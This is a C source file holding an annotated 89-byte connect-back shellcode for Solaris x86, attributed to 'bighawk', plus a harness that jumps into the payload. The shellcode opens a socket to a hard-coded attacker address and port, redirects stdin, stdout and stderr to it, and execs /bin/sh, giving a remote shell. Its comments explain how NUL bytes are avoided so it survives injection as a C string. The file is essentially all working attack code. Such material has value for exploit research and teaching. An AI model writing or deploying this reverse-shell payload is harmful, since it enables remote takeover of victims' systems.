/* 89 bytes connect-back shellcode - Solaris-x86
 * - by bighawk (bighawk@warfare.com)
 *
 * This shellcode connects back to IPADDR:PORT (both defined below as raw
 * bytes in network byte order), dup2()s the socket over stdin/stdout/stderr
 * and execs /bin/sh. No syscall return value is checked.
 * Tested on: SunOS 5.7
 */
 
#include <stdio.h>
#include <string.h>

#define IPADDR  "\x03\x01\x33\x07"
#define PORT    "\x28\x11"              /* 0x2811 = port 10257 in network byte order; htons(10000) would be "\x27\x10".
                                         * Neither PORT nor IPADDR may contain 0x00: the payload is handled as a C string. */

/*
 * Raw payload. main() executes this array directly and reports strlen(code),
 * so a 0x00 byte anywhere (realistically only in IPADDR or PORT) makes the
 * reported length short and would truncate a string-based delivery.
 *
 * Solaris/x86 syscall convention as used here: syscall number in eax,
 * arguments pushed on the stack (last argument first), kernel entered with
 * `lcall $0x7,$0x0`. That instruction encodes as 9a 00 00 00 00 07 00 and is
 * full of NUL bytes, so the stub is assembled on the stack at runtime and
 * reached via `call ebp`; the return address that `call` pushes fills the
 * slot the kernel expects above the arguments. The stub ends in `ret`, which
 * pops only that return address, so pushed arguments stay on the stack.
 */
char code[] =
   "\xb8\xff\xf8\xff\x3c"	// mov    eax, 03cfff8ffh   ; bitwise NOT of 0xc3000700, written this way to avoid NULs
   "\xf7\xd0"			// not    eax               ; eax = 0xc3000700
   "\x50"			// push   eax               ; stack bytes: 00 07 00 c3 (selector 0x0007, then ret)
   "\x31\xc0"			// xor    eax, eax
   "\xb0\x9a"			// mov    al, 09ah
   "\x50"			// push   eax               ; stack bytes: 9a 00 00 00 -> "lcall $0x7,$0x0 ; ret"
   "\x89\xe5"			// mov    ebp, esp          ; ebp -> syscall stub, reused by every `call ebp` below
   /* socket(AF_INET, SOCK_STREAM, 0) */
   "\x31\xc9"			// xor    ecx, ecx
   "\x51"			// push   ecx               ; protocol = 0
   "\x41"			// inc    ecx
   "\x41"			// inc    ecx               ; ecx = 2
   "\x51"			// push   ecx               ; type = SOCK_STREAM (2)
   "\x51"			// push   ecx               ; family = AF_INET (2)
   "\xb0\xe6"			// mov    al, 230           ; SYS_so_socket on SunOS 5.x; eax upper bytes are 0 from the xor above
   "\xff\xd5"			// call   ebp               ; eax = socket fd (no error check)
   /* connect(fd, &sin, 16) */
   "\x31\xd2"			// xor    edx, edx          ; dead store: edx is zeroed again before first use below
   "\x89\xc7"			// mov    edi, eax          ; edi = socket fd, kept for connect() and the dup loop
   "\x68"IPADDR			// push   dword IPADDR      ; sin_addr (network byte order)
   "\x66\x68"PORT		// push   word PORT         ; sin_port (network byte order)
   "\x66\x51"			// push   cx                ; sin_family = AF_INET (cx is still 2)
   "\x89\xe6"			// mov    esi, esp          ; esi -> sockaddr_in; only 8 bytes are built, sin_zero is whatever follows on the stack
   "\x6a\x10"			// push   byte 16           ; addrlen = sizeof(struct sockaddr_in)
   "\x56"			// push   esi               ; addr
   "\x57"			// push   edi               ; fd
   "\xb0\xeb"			// mov    al, 235           ; SYS_connect
   "\xff\xd5"			// call   ebp               ; connect(); a failure is not detected, the payload just continues
   /* for (ecx = 2; ecx >= 0; ecx--) fcntl(fd, F_DUP2FD, ecx): socket onto stderr, stdout, stdin */
   "\x31\xd2"			// xor    edx, edx          ; lp: loop target of the jns below
   "\xb2\x09"			// mov    dl, 9             ; F_DUP2FD
   "\x51"			// push   ecx               ; target fd: 2, then 1, then 0
   "\x52"			// push   edx               ; cmd = F_DUP2FD
   "\x57"			// push   edi               ; socket fd
   "\xb0\x3e"			// mov    al, 62            ; SYS_fcntl
   "\xff\xd5"			// call   ebp               ; returns the new fd (0 on the last iteration, which the execve block relies on)
   "\x49"			// dec    ecx
   "\x79\xf2"			// jns    lp                ; rel8 -14 = back to the xor edx,edx above; falls through once ecx < 0
   /* execve("/bin//sh", {"/bin//sh", NULL}, NULL) -- assumes eax == 0 from the final fcntl */
   "\x50"			// push   eax               ; NUL terminator for the path string
   "\x68\x2f\x2f\x73\x68"	// push   dword 68732f2fh   ; "//sh"
   "\x68\x2f\x62\x69\x6e"	// push   dword 6e69622fh   ; "/bin" -> "/bin//sh" (doubled slash pads to 8 NUL-free bytes)
   "\x89\xe3"			// mov    ebx, esp          ; ebx -> path
   "\x50"			// push   eax               ; argv[1] = NULL
   "\x53"			// push   ebx               ; argv[0] = path
   "\x89\xe2"			// mov    edx, esp          ; edx -> argv
   "\x50"			// push   eax               ; envp = NULL
   "\x52"			// push   edx               ; argv
   "\x53"			// push   ebx               ; path
   "\xb0\x3b"			// mov    al, 59            ; SYS_execve
   "\xff\xd5";			// call   ebp               ; does not return on success; on failure execution runs off the end of the buffer

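/*
 * Test harness: report the payload length, then jump into it.
 *
 * strlen() is the right measure here because the payload is meant to be
 * delivered as a C string; if strlen(code) is shorter than sizeof code - 1,
 * some byte (realistically in IPADDR or PORT) is 0x00 and a real delivery
 * would truncate the payload. The harness warns but still runs the whole
 * array so the shell can be exercised locally.
 *
 * On systems that map .data non-executable (NX / W^X) the indirect call
 * faults; the bytes would have to be copied into a PROT_EXEC mapping first.
 * That was not a concern on the SunOS 5.7 target this was tested on.
 *
 * Returns 0 only if the payload returns, which on success it never does
 * (execve replaces the process).
 */
int main(void) {
  /* Object-pointer to function-pointer conversion is not strictly portable
   * C, but it is the conventional way to execute an in-memory payload. */
  void (*entry)(void) = (void (*)(void))code;
  size_t len = strlen(code);

  printf("size: %zu bytes\n", len);
  if (len != sizeof code - 1) {
    fprintf(stderr,
            "warning: payload contains a NUL byte (strlen %zu, array %zu); "
            "a string-based delivery would truncate it\n",
            len, sizeof code - 1);
  }

  entry();
  return 0;
}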
